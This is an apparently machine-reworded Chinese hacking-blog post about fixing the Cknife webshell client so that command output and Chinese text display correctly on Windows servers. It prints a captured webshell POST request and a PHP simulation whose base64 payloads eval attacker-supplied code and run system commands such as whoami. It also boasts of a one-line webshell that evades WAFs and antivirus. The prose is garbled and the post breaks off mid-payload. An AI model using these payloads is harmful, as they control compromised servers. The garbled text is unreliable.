Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码

Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码

黑客软件hacker2019-06-14 6:20:2210314A+A-

在如今大街小巷水果刀都存有侧门难题的那时候,Cknife杀手锏了。由于开源系统,因此安全性。由于可实际操作的室内空间很大的,也非常合适过各种各样WAF。下边就是说处理2个疑难问题的全过程。期待能够帮上诸位白帽子。

  专用工具强烈推荐:Cknife,跨平台版中国菜刀宣布开源系统?

Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码 第1张

  可是应用全过程中也碰到了某些小难题,被调侃数最多的就是说中文乱码及其一部分Windows自然环境shell没法回显。下边我来剖析全过程,解决困难:最先是shell回显难题,shell在一部分windows自然环境中是不可以实行cmd的

  哇,气死人了。

  昨天晚上写出来配套设施的过狗过D盾过电脑管家一句话木马,也把Cknife的统计数据干了数据加密。

  显然,这物品没办法好好地应用啊!

  检测一段话(服务器端):

  因此给Cknife,联接shell,开启burp抓包

  它是实行”whoami”那时候的post请求,沒有回到的报文。?

  POST /test.Python .com/1.2 User-Agent: javas/1.8.0_121 Host: localhost

  Accept: text/html语言, image/gif, image/jpeg, *; q=.4, */*; q=.4

  Content-type: application/x-WWW-form-urlencoded

  Content-Length: 598 Connection: close a=QGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbYWN0aW9uXSkpOw== &action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtzeXN0ZW0oJHIuIiAyPiYxIiwkcmV0KTtwcmludCAoJHJldCE9MCk/IgpyZXQ9eyRyZXR9CiI6IiI7O2VjaG8oInw8LSIpO2RpZSgpOw%3d%3d&z1=Y21k&z2=Y2QvZCJEOlxwaHBTdHVkeVxXV1dcIiZkaXImZWNobyBbU10mY2QmZWNobyBbRV0%3d

  当地仿真模拟了服务器端解决手机客户端post请求的情景

  全句智能化原創Python //手机客户端上传post请求 $_POST['a'] = 'QGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbYWN0aW9uXSkpOw==';

  $_POST['z1']='Y21k';

  $_POST['z2']='Y2QvZCJEOlxwaHBTdHVkeVxXV1dcIiZ3aG9hbWkmZWNobyBbU10mY2QmZWNobyBbRV0=';

  $_POST['action']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtzeXN0ZW0oJHIuIiAyPiYxIiwkcmV0KTtwcmludCAoJHJldCE9MCk/IgpyZXQ9eyRyZXR9CiI6IiI7O2VjaG8oInw8LSIpO2RpZSgpOw=='; //服务器端 eval(base64_decode($_POST['a']).';');

  随后Base64编解码

  全句智能化原創Python $_POST['z1']='Y21k';

  $_POST['z2']='Y2Qv


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 世味绿脊2022-06-01 20:34:06
  • skYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtzeXN0ZW0oJHIuIiAyP
  • 掩吻掩吻2022-06-01 21:42:12
  • 户端post请求的情景  全句智能化原創Python //手机客户端上传post请求 $_POST['a'] = 'QGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbYWN0aW9uX
  • 惑心节枝2022-06-02 01:28:18
  • eXN0ZW0oJHIuIiAyPiYxIiwkcmV0KTtwcmludCAoJHJldCE9MCk/IgpyZXQ9eyRyZXR9CiI6IiI7O2VjaG8oInw8LSIpO2RpZSgpOw%3d%3d&z1=Y
  • 野欢岛徒2022-06-01 21:52:31
  • 境shell没法回显。下边我来剖析全过程,解决困难:最先是shell回显难题,shell在一部分windows自然环境中是不可以实行cmd的  哇,气死人了。  昨天晚上写出来配套设施的过

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理